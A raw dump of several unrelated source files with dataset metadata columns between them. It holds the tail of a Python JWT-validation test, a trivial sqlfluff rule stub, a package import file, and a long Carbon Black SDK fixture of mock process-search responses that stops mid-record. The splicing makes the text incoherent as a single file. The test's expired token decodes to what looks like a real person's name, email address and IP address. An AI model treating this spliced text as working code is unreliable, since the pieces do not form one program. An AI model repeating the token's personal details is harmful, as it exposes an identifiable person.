str(exception_info.value)
== "a3QN0BZS7s4nN-BdrjbF0Y_LdMM is not a valid key identifier. Valid ones are ['u4OfNFPHwEBosHjtrauObV84LnY', 'u4OfNFPHwEBosHjtrauObV84LnG']."
)
def test_identity_provider_error(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
status=500,
json={"error": "Test error."},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSIsImtpZCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNDkwNzc5NzEyLCJuYmYiOjE0OTA3Nzk3MTIsImV4cCI6MTQ5MDc4MzYxMiwiYW1yIjpbInB3ZCJdLCJmYW1pbHlfbmFtZSI6IkRlIE1hZXllciIsImdpdmVuX25hbWUiOiJGYWJyaWNlIiwiaXBhZGRyIjoiMTA0LjQ2LjU4LjE0OSIsIm5hbWUiOiJEZSBNYWV5ZXIgRmFicmljZSAoZXh0ZXJuYWwpIiwibm9uY2UiOiI3MzYyQ0FFQS05Q0E1LTRCNDMtOUJBMy0zNEQ3QzMwM0VCQTciLCJvaWQiOiI1YTJmOGQyYS0xNzQ1LTRmNTctOTcwYS03YjIwMzU5YWUyZGMiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0yODUxNjAiLCJwbGF0ZiI6IjMiLCJzdWIiOiJRcjhNZlAwQk9oRld3WlNoNFZSVEpYeGd3Z19XTFBId193TnBnS1lMQTJVIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJCSUY1OTBAZW5naWUuY29tIiwidXBuIjoiQklGNTkwQGVuZ2llLmNvbSIsInZlciI6IjEuMCJ9.vZO7a5Vs0G_g92Bb00BPKcLuF9WmrqfLjwbLhz8xEe3OfqfthWHqh_jzf_Md88INc4ZuMqOMPhWZTZjQMgCACIpTiHDpFRkokZ-jqC09BaQSSjwV_27b-zy-m6CZcFtdUe10LIBQEqiL9JnZlVIrBgFqr49bKBvZKr3uuaoeiuR2XcC0U2klYkDr3CYIexX0w57lvD5Ow0xKkdWKYVswcJipenU9PP63R0wNXr-8cb-6PGIUzaQDREo-EuR2e3uShF9u5cagG7emt9fDmJr8eGxBJU9ppRoffJpuaYeJiIg1F_n0iK7hENnIjZVnHjFn46DZO-RPse8YZjd4YBuKsg"
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(expired, "https://test_id_provider")
assert (
str(exception_info.value)
== 'Identify provider cannot be reached: {"error": "Test error."}'
)
| 83.698925
| 1,466
| 0.839543
| 737
| 15,568
| 17.542741
| 0.303935
| 0.022121
| 0.013613
| 0.016165
| 0.891871
| 0.88228
| 0.881197
| 0.877639
| 0.877639
| 0.867894
| 0
| 0.113898
| 0.106115
| 15,568
| 185
| 1,467
| 84.151351
| 0.815177
| 0
| 0
| 0.417722
| 0
| 0.025316
| 0.724692
| 0.657181
| 0
| 1
| 0
| 0
| 0.094937
| 1
| 0.082278
| false
| 0
| 0.025316
| 0
| 0.107595
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
3dc699d24d5957b9c19b7f0d479fc000a66cd954
| 89
|
py
|
Python
|
test/fixtures/rules/custom/L000.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 3,024
|
2020-10-01T11:03:51.000Z
|
2022-03-31T16:42:00.000Z
|
test/fixtures/rules/custom/L000.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 2,395
|
2020-09-30T12:59:21.000Z
|
2022-03-31T22:05:29.000Z
|
test/fixtures/rules/custom/L000.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 246
|
2020-10-02T17:08:03.000Z
|
2022-03-30T17:43:51.000Z
|
"""Test std rule import."""
class Rule_L000:
"""Test std rule import."""
pass
| 11.125
| 31
| 0.58427
| 12
| 89
| 4.25
| 0.583333
| 0.27451
| 0.431373
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044776
| 0.247191
| 89
| 7
| 32
| 12.714286
| 0.716418
| 0.483146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3dc77bd555db9eb497f00036eb4a7970c2d7e502
| 204
|
py
|
Python
|
Dockerfiles/schedd-exporter/exporter/condor/__init__.py
|
ahmadalkhansa/kube-htc
|
a2fb8aa9e9ea25cddf03260f0b4863e8dcf53890
|
[
"Apache-2.0"
] | null | null | null |
Dockerfiles/schedd-exporter/exporter/condor/__init__.py
|
ahmadalkhansa/kube-htc
|
a2fb8aa9e9ea25cddf03260f0b4863e8dcf53890
|
[
"Apache-2.0"
] | 1
|
2021-04-23T10:36:38.000Z
|
2021-04-23T10:36:38.000Z
|
Dockerfiles/schedd-exporter/exporter/condor/__init__.py
|
ahmadalkhansa/kube-htc
|
a2fb8aa9e9ea25cddf03260f0b4863e8dcf53890
|
[
"Apache-2.0"
] | null | null | null |
from exporter.condor.CondorJob import CondorJob
from exporter.condor.CondorJobCluster import CondorJobCluster
from exporter.condor.CondorMachine import Machine
from exporter.condor.CondorSlot import Slot
| 40.8
| 61
| 0.882353
| 24
| 204
| 7.5
| 0.416667
| 0.266667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 204
| 4
| 62
| 51
| 0.957447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9adb5628a65c9551691ccdcb17674a132eed642e
| 105,530
|
py
|
Python
|
src/tests/unit/fixtures/platform/mock_process.py
|
rmcqueen-cb/carbon-black-cloud-sdk-python
|
5fbbe96fd6c2e97f0e13c4223ff5d6ee9b0ede43
|
[
"MIT"
] | null | null | null |
src/tests/unit/fixtures/platform/mock_process.py
|
rmcqueen-cb/carbon-black-cloud-sdk-python
|
5fbbe96fd6c2e97f0e13c4223ff5d6ee9b0ede43
|
[
"MIT"
] | null | null | null |
src/tests/unit/fixtures/platform/mock_process.py
|
rmcqueen-cb/carbon-black-cloud-sdk-python
|
5fbbe96fd6c2e97f0e13c4223ff5d6ee9b0ede43
|
[
"MIT"
] | null | null | null |
"""Mock responses for process queries."""
GET_PROCESS_RESP = {}
GET_PROCESS_VALIDATION_RESP = {
"valid": True,
"value_search_query": False
}
GET_PROCESS_VALIDATION_RESP_INVALID = {
"invalid_message": "Invalid Query Parameter",
"valid": False,
"value_search_query": False,
"invalid_trigger_offset": 0
}
POST_PROCESS_SEARCH_JOB_RESP = {
"job_id": "2c292717-80ed-4f0d-845f-779e09470920"
}
POST_TREE_SEARCH_JOB_RESP = {
"job_id": "ee158f11-4dfb-4ae2-8f1a-7707b712226d"
}
GET_TREE_SEARCH_JOB_RESP = {
"contacted": 34,
"completed": 34
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0002b226-00000001-00000000-1d6225bbba74c00procsearchparent",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-0034d5f2-00000ba0-00000000-1d68709850fe522getprocjobres",
"process_hash": [
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d",
"c7084336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
5653,
16139
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 616,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_ZERO = {
"results": [],
"num_found": 616,
"num_available": 1,
"contacted": 0,
"completed": 0
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_STILL_QUERYING = {
"results": [],
"num_found": 616,
"num_available": 1,
"contacted": 10,
"completed": 0
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_1 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15",
"12384336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
3909
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_NO_PARENT_GUID = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15",
"12384336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
3909
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_NO_PID = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15",
"12384336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_2 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"63d423ea882264dbb157a965c200306212fc5e1c6ddb8cbbb0f1d3b51ecd82e6",
"45684336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
788
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_3 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
788
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_PARENT_JOB_RESULTS_RESP = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "parentofparent",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-0002b226-00000001-00000000-1d6225bbba74c01",
"process_hash": [
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d",
"c7084336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
2976
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_PARENT_JOB_RESULTS_RESP_1 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-0002b226-00000001-00000000-1d6225bbba74c01",
"process_hash": [
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d",
"c7084336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
2976
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESP = {
"contacted": 45,
"completed": 45,
"query": {
"cb.max_backend_timestamp": 1599853172000,
"cb.min_backend_timestamp": 0,
"cb.min_device_timestamp": 0,
"cb.preview_results": 500,
"cb.use_agg": True,
"facet": False,
"fl": "*,parent_hash,parent_name,process_cmdline,backend_timestamp,device_external_ip,device_group,device_internal_ip,device_os,process_effective_reputation,process_reputation,ttp", # noqa: E501
"fq": "{!collapse field=process_collapse_id sort='max(0,legacy) asc,device_timestamp desc'}",
"q": "(process_guid:test-0034d5f2-00000ba0-00000000-1d68709850fe521)",
"rows": 500,
"start": 0
},
"search_initiated_time": 1599853172533,
"connector_id": "ABCDEFGH"
}
GET_PROCESS_SUMMARY_RESP = {
"completed": 30,
"contacted": 30,
"exception": "",
"summary": {
"children": [
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-03T20:33:19.002Z",
"childproc_count": 1,
"crossproc_count": 5,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:31:13.097Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1607027590489,
"modload_count": 18,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wddisable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-0000157c-00000000-1d6c9b339b4a0cd",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
5500
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-03T20:31:05.847Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
},
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-02T05:59:53.548Z",
"childproc_count": 1,
"crossproc_count": 4,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:45:15.950Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1606888776302,
"modload_count": 16,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
7544
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:45:15.531Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
}
],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"process": {
"_process_filename": "bash",
"backend_timestamp": "2020-08-28T19:16:11.959Z",
"childproc_count": 333580,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
